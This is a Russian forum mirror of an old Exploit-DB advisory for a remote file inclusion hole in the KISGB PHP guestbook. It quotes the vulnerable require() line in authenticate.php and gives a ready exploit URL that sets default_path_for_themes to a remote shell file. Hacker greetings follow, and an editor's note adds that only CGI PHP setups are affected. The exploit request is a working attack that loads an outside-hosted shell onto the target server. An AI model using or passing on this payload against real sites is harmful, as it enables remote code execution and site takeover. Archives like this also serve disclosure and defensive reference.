- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2979
- Проверка EDB
-
- Пройдено
- Автор
- MDX
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-1635 cve-2006-6764 cve-2006-6763
- Дата публикации
- 2006-12-22
Код:
******************************************************************************************************
*KISGB (Keep It Simple Guest Book)* [default_path_for_themes] ******************* Remote File Include*
******************************************************************************************************
*******************************************
+class : Remote File Include Vulnerability*
+******************************************************************************************************************
+download link : http://phpnuke-downloads.com/modules.php?name=Downloads&d_op=ns_getit&cid=14&lid=156&type=url#get*
*******************************************************************************************************************
+Author : mdx
*
*****************************************************************************
+Files : *
+authenticate.php? *
**********************************************************************************
+code : *
+ *
+if (isset($default_path_for_themes)) require("$default_path_for_themes/$theme");*
+ *
*********************************************************************************************
+ Exploit : *
+********************************************************************************************+
+ http://www.site.***/[path]/authenticate.php?default_path_for_themes=http://mdxshell.txt? +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
==============================================================================================
? Hi , The_bat_hacker , How are you ? ;=) *
? *
? Thanks ; Cyber-WARRIOR TIM USERS, xoron , prohack ,leak , ozii , sakkure , abbad, dreamlord*
? *
?/////////////////////////////////////////////////////////////////////////////////////////////
?---------------------specials thanks stroke ,SHiKaA----------------------------------------*
**********************************************************************************************
******************* *
******************* KORKULARINIZ SADECE KABUSLARINIZDIR.. *
******************* *
******************* Turkish Hacker by mdx *
******************* *
******************* Korkmak Kurtulmak Degildir. *
******************* *
**********************************************************************************************
//////////////////////////////////////////////////////////////////////////////////////////////
Notes:
$sapi_name = strtolower(php_sapi_name());
if (strpos($sapi_name,"cgi")===FALSE) {
}
else {
Vulnerable here.
So this is only vulnerable for CGI PHP versions.
/str0ke
# milw0rm.com [2006-12-22]- Источник
- www.exploit-db.com
